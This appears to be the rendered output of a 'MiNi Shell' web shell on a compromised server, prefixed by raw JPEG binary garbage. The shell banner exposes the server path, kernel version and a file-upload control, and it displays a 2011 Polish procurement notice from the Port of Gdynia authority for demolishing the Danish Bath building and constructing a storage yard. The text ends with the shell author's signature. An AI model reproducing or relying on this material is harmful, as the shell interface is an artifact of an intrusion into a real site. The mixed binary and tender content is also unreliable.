JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111213/423674-N-2011.html

<p class="kh_header"><b>Gdynia: wykonanie rozbiórki budynku Łaźni Duńskiej i budowa placu składowego na terenie znajdującym się pomiędzy nabrzeżem Duńskim , a istniejącym placem składowym oraz istniejącym placem składowym, a terenem należącym do Urzędu Morskiego.</b><br>
<b>Numer ogłoszenia: 423674 - 2011; data zamieszczenia: 13.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Morskiego Portu Gdynia S.A. , ul. Rotterdamska 9, 81-337 Gdynia, woj. pomorskie, tel. 058 627 40 36, faks 058 6274578.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.port.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: podmiot zarządzajacy portem morskim o podstawowym znaczeniu dla gospodarki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie rozbiórki budynku Łaźni Duńskiej i budowa placu składowego na terenie znajdującym się pomiędzy nabrzeżem Duńskim , a istniejącym placem składowym oraz istniejącym placem składowym, a terenem należącym do Urzędu Morskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest  wykonanie rozbiórki budynku Łaźni Duńskiej oraz budowa placu składowego na terenie znajdującym się pomiędzy nabrzeżem Duńskim, a istniejącym placem składowym oraz istniejącym placem składowym, a terenem należącym do Urzędu Morskiego.

2.Zakres robót budowlanych ujęty jest w n/w projektach budowlanych i wykonawczych opracowanych przez konsorcjum firm: Lider Konsorcjum- L-CONCEPT Leszek Karasiński z siedzibą w Ustroniu i Partner Konsorcjum - SMART ARCHITEKCI z siedzibą w Zgorzelcu i obejmuje m.in.:
1)	rozbiórkę dwukondygnacyjnego budynku Łaźni Duńskiej;
2)	budowę placu składowego o nawierzchni betonowej;
3)	przebudowę uzbrojenia podziemnego - sieci:
a) wodno-kanalizacyjną,
b) energetyczną,
c) c.o.,
d) telekomunikacyjną.	

3.Szczegółowy zakres przedmiotu umowy określa  n/w dokumentacja   projektowa, z zastrzeżeniem  ust. 4 niniejszego rozdziału:

1)projekt budowlany:
a)część B- Projekt zagospodarowania terenu,
b)część C- Projekt architektoniczno-budowlany- opis techniczny wyburzeń,
c)część D- Projekt - instalacje sanitarne,
d)część E - Projekt - instalacje elektryczne,
e)część F- Informacja w sprawie ochrony bezpieczeństwa i ochrony zdrowia,
f)część G- Dokumentacja geotechniczna;

2)projekty wykonawcze:
a)tom I - Projekt zagospodarowania terenu- branża architektoniczno-konstrukcyjna,
b)tom II - branża drogowa,
c)tom III - instalacje sanitarne,
d)tom IV- instalacje elektryczne i teletechniczne;

3)tom V - przedmiar robót  jako materiał pomocniczy; jeżeli w przedmiarze występują różnice w stosunku do dokumentacji projektowej, do wyceny należy przyjąć ilości wynikające z dokumentacji projektowej;

4)tom VII - specyfikacja techniczna.

4.W trakcie realizacji robót ujętych w dokumentacji projektowej, o której mowa w ust.3 należy uwzględnić wyszczególnione poniżej ograniczenia:

1)branża drogowa: należy wykonać zakres rzeczowy projektu budowlanego i wykonawczego z ograniczeniem wymiany istniejącej nawierzchni placu składowego tj. z 50% na 12%;

2)instalacje sanitarne -wodociąg: należy zrealizować cały zakres rzeczowy przewidziany projektem budowlanym i wykonawczym, a w szczególności likwidację przyłącza wodociągowego do rozbieranego budynku;

3)instalacje sanitarne- sieć c.o.: należy zrealizować cały zakres rzeczowy przewidziany projektem budowlanym i wykonawczym;

4)instalacje sanitarne - kanalizacja deszczowa: należy zrealizować zakres rzeczowy projektu budowlanego i wykonawczego z wyłączeniem  następujących elementów:
a) istniejące wpusty WPi na istniejącym placu pozostawić bez realizacji,
b) pozostawić na istniejącym placu studnie kanalizacji deszczowej związane z rozbieranym budynkiem z jednoczesnym unieczynnieniem (zaślepieniem) ciągów kanalizacyjnych ciążących do tych studni;

5)instalacje elektryczne i teletechniczne - instalacje elektroenergetyczne: należy zrealizować zakres rzeczowy przewidziany projektem budowlanym i wykonawczym z wyłączeniem elementu jakim jest uporządkowanie sieci elektroenergetycznych zlokalizowanych w pasie rozbieralnym na krawędzi istniejącego placu wzdłuż nabrzeża Duńskiego;


6)instalacje elektryczne i teletechniczne- instalacje teletechniczne:
a) zlikwidować studnię S1 zgodnie z projektem,
b) wybudować nowe studnie S6 - zgodnie z projektem,
c) wybudować nową studnię S4A w lokalizacji innej niż wskazana w projekcie, tj. na granicy  placu po wyburzonym budynku, a istniejącym placem składowym w linii projektowanej  kanalizacji teletechnicznej,
d) wykonać dwa nowe przepusty z rur grubościennych PCV 110 od nowej studni S4A do S6 w zmienionej ilości ( było około 79mb; po zmianie lokalizacji studzienki S4A będzie około 35mb),
e) wykonać wszystkie roboty związane z położeniem  kabli i wykonaniem złącz zgodnie z projektem,
f) studnię S2 i kanalizację teletechniczną ze studni S2-S3 w trakcie robót zabezpieczyć tak, by   nie uległa uszkodzeniom w czasie robót rozbiórkowych.

5.Zakres przedmiotu umowy obejmuje również wykonanie dokumentacji powykonawczej zawierającej m.in.:
1)geodezyjną inwentaryzację powykonawczą zarejestrowaną w Ośrodku Dokumentacji Geodezyjno-Kartograficznej - w 3-egz.;
2)pełną dokumentację powykonawczą zawierającą wszystkie zmiany (rysunki zamienne) wprowadzone w trakcie realizacji robót -  po 3 egz. odrębnie dla każdej branży;
3)zestawienia  wykonanych robót - 3 egz.;
4)dokumentację powykonawczą w formie elektronicznej:
a) geodezyjną inwentaryzację powykonawczą w formacie dgn w układzie współrzędnych  PUWG 2000,
b) pomiar geodezyjny opracowany w dwg z obliczeniem powierzchni lub długości poszczególnych elementów nawierzchni drogowej wraz z zestawieniem wykonanych robót.

6.Szczególne warunki prowadzenia robót stanowiących przedmiot zamówienia;
1)pozwolenie na budowę Zamawiający dostarczy Wykonawcy przed zawarciem umowy;
2)zaplecze budowy zostanie wskazane Wykonawcy w dniu przekazania terenu budowy;
3)Wykonawca sporządzi i dostarczy  Zamawiającemu  przed zawarciem umowy harmonogram rzeczowo-finansowy realizacji robót z podziałem na branże (zgodnie z podziałem wyszczególnionym w ust. 1 formularza oferty), uwzględniający warunki prowadzenia robót oraz wszystkie elementy wchodzące w skład przedmiotu zamówienia z zaznaczeniem planowanego czasu, wartości i terminów ich wykonania. Harmonogram należy uzgodnić:
a)ze służbami  Zamawiającego, tj.:
-Działem Budowli Hydrotechnicznych, 
-Działem Budowli Energetycznych i Wodnych,
-Działem Budynków i Zaplecza Technicznego,
 -Działem  Informatyki i Telekomunikacji;
b)oraz Morskim Terminalem Masowym Gdynia Spółka z o.o.
4)Wykonawca sporządzi i dostarczy Zamawiającemu  przed zawarciem umowy projekt organizacji ruchu na czas prowadzenia robót uzgodniony:
a)ze służbami Zamawiającego, tj.:
- Działem Budowli Hydrotechnicznych,
- Działem Nieruchomości;
b)Morskim Terminalem Masowym Gdynia Spółka z o.o.;
5)Wykonawca zobowiązany jest do prowadzenia cotygodniowych narad roboczych na budowie z udziałem przedstawicieli Zamawiającego, MTMG Spółka z o.o, ( w razie konieczności ) projektantów. W związku z powyższym Wykonawca  przygotuje pomieszczenie dostosowane do prowadzenia cotygodniowych narad dla ok. 10 osób;
6)przed  przystąpieniem do robót we własnym zakresie i na swój koszt  Wykonawca sporządzi dokumentację fotograficzną  terenu budowy i obiektów sąsiadujących;
7)istniejący obiekt kubaturowy należy rozebrać do głębokości 1,5m poniżej rzędnej projektowanej nawierzchni;

8)Wykonawca zobowiązany jest prowadzić roboty w taki sposób, aby nie wystąpiły uszkodzenia obiektów i infrastruktury, zlokalizowanych na terenie budowy i niepodlegających przebudowie oraz zlokalizowanych poza terenem budowy. W przypadku wystąpienia uszkodzeń tych obiektów lub infrastruktury, Wykonawca zobowiązany będzie  na swój koszt do naprawy lub odtworzenia tych obiektów lub infrastruktury;
9)Wykonawca zobowiązany jest prowadzić dokumentację fotograficzną z realizacji robót w odstępach dwutygodniowych, w ilości co najmniej 5 zdjęć w każdych dwóch tygodniach w formie zdjęć cyfrowych z istotnych powtarzalnych miejsc  terenu budowy. Zdjęcia muszą być opisane (z automatycznym datownikiem) i zarchiwizowane w formacie cyfrowym na nośniku DVD lub CD. Odbitki powinny być wykonane w formacie 10x15 2 w 2-ch egz. ( łącznie z zapisem na DVD lub CD).
10)Wykonawca zapewni na swój koszt kompleksową obsługę geodezyjną wraz z operatem  powykonawczym oraz obsługę geologiczną. Wyniki badań /stopnia zagęszczenia gruntu Wykonawca  dostarczy Zamawiającemu przed przystąpieniem do wykonywania robót technologicznych. Pomiary stopnia zagęszczenia gruntów należy na bieżąco sprawdzać, a wyniki przekazywać inspektorowi nadzoru ( dot. także robót podwykonawców);
11)Wykonawca zobowiązany jest do wykonania tymczasowych przełączeń sieci w zależności od przyjętego etapowania  realizacji robót;
12)Wykonawca na każdym etapie realizacji robót zapewni ciągłość dostawy mediów do odbiorców;
13)Wykonawca zobowiązany jest do zapewnienia w trakcie realizacji robót odbioru wód opadowych i roztopowych oraz oświetlenia ciągów komunikacyjnych, którymi w poszczególnych etapach prowadzony będzie ruch pieszy i kołowy;
14)roboty polegające na przebudowie telekomunikacyjnych kabli miedzianych muszą być wykonane przed wyburzeniem budynku, ze względu na istniejący w nim węzeł, który zasila inne obiekty w sąsiedztwie;
15)wszystkie roboty wymagające przerw w eksploatacji kabli telekomunikacyjnych, należy co do szczegółów uzgodnić z Działem  Informatyki i Telekomunikacji ZMPG S.A., natomiast co do terminów ich realizacji z Morskim Terminalem Masowym Gdynia Spółka z o.o. eksploatującym obiekty zasilane z tych kabli;
16)wszystkie kable nie ujęte w dokumentacji projektowej, a odkryte w czasie wykonywania robót ziemnych, należy traktować jako czynne i każdorazowo uzgadniać ich status z inspektorem nadzoru;
17)Wykonawca zobowiązany jest:
a)na swój koszt zapewnić bezpieczną organizację ruchu kołowego i pieszego wraz z czytelnym i widocznym oznakowaniem oraz utrzymanie porządku na trasie tymczasowego objazdu na terenie prowadzonych robót,
b)na swój koszt zabezpieczyć i utrzymywać wykopy,
c)uzyskiwać każdorazowo akceptację inspektora nadzoru na wbudowanie wszystkich materiałów budowlanych ( na 14 dni przed wbudowaniem materiału),
d)przedkładać inspektorowi nadzoru do akceptacji recepty na mieszanki betonowe i mineralno-asfaltowe przed wbudowaniem materiału.

7.Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych do wskazanych w dokumentacji projektowej,  pod warunkiem, że  posiadają one nie gorsze właściwości i parametry techniczne niż przyjęte w dokumentacji projektowej oraz specyfikacjach technicznych wykonania i odbioru robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.11.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazac się wykonaniem w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie  3-ch robót  budowlanych w zakresie budowy lub przebudowy infrastruktury drogowej wraz z uzbrojeniem, w tym co najmniej jedna robota na kwotę minimum netto 1.000.000,00 zł .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się , że dysponuje osobami zdolnymi do wykonania zamówienia, którzy zgodnie z art.12 Prawa budowlanego mogą pełnić samodzielne funkcje techniczne w budownictwie obejmujące kierowanie robotami budowlanymi, tj.:
a)kierownik budowy - jedna osoba posiadająca uprawnienia budowlane bez ograniczeń o specjalności konstrukcyjno-budowlanej,
b)kierownicy robót- dla każdej branży - jedna osoba  posiadająca uprawnienia budowlane bez ograniczeń w  specjalności drogowej, specjalności instalacyjnej w zakresie sieci wodociągowo-kanalizacyjnych oraz sieci c.o., specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektroenergetycznych oraz  telekomunikacyjnych.
Wymagana jest przynależność kierownika budowy oraz kierowników robót do właściwej izby samorządu zawodowego na dzień składania ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. posiada dostęp do wolnych środków finansowych lub zdolność kredytową na kwotę nie mniejszą niż 500.000,00 zł ( słownie: pięćset tysięcy złotych), pozwalającą na realizację zamówienia zgodnie z harmonogramem robót, przy założeniu, że zapłata za wykonane i odebrane roboty dokonywana będzie raz w miesiącu w terminie 30 dni od dnia otrzymania faktury;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.port.gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> j.kreft@port.gdynia.pl
j.romanowska@port.gdynia.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2012 godzina 09:00, miejsce: Zarząd Morskiego Portu gdynia S.A., ul. Rotterdamska 9, klatka B, III piętro, pokój nr 328 - Dział Umów i Rozliczeń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający żąda zabezpieczenia należytego wykonania umowy.Wykonawca najpóźniej w dniu podpisania umowy przed jej zawarciem  wnosi zabezpieczenie należytego wykonania umowy w wysokości 5 % ceny całkowitej brutto podanej w ofercie.Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. Jeżeli Wykonawca jest jednocześnie gwarantem, zabezpieczenie służy także pokryciu roszczeń z tytułu gwarancji jakości. Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:pieniądzu,gwarancjach bankowych,gwarancjach ubezpieczeniowych.
Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego podany w Rozdziale 2 SIWZ z dopiskiem Zabezpieczenie należytego wykonania umowy na wykonanie rozbiórki budynku Łaźni Duńskiej i budowy placu składowego na terenie znajdującym się pomiędzy nabrzeżem Duńskim, a istniejącym placem składowym oraz istniejącym placem składowym, a terenem należącym do Urzędu Morskiego.

Zamawiający  zwróci   zabezpieczenie  należytego wykonania umowy w terminie 30 dni od dnia podpisania protokołu odbioru końcowego całości robót bez zastrzeżeń.

Kwota pozostawiona na zabezpieczenie roszczeń Zamawiającego z tytułu   rękojmi  za wady lub gwarancji jakości wyniesie 30% wniesionego zabezpieczenia należytego wykonania umowy.

Kwotę, o której mowa powyżej,  Zamawiający zwróci nie później niż w 30 dni po upływie okresu rękojmi za wady..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com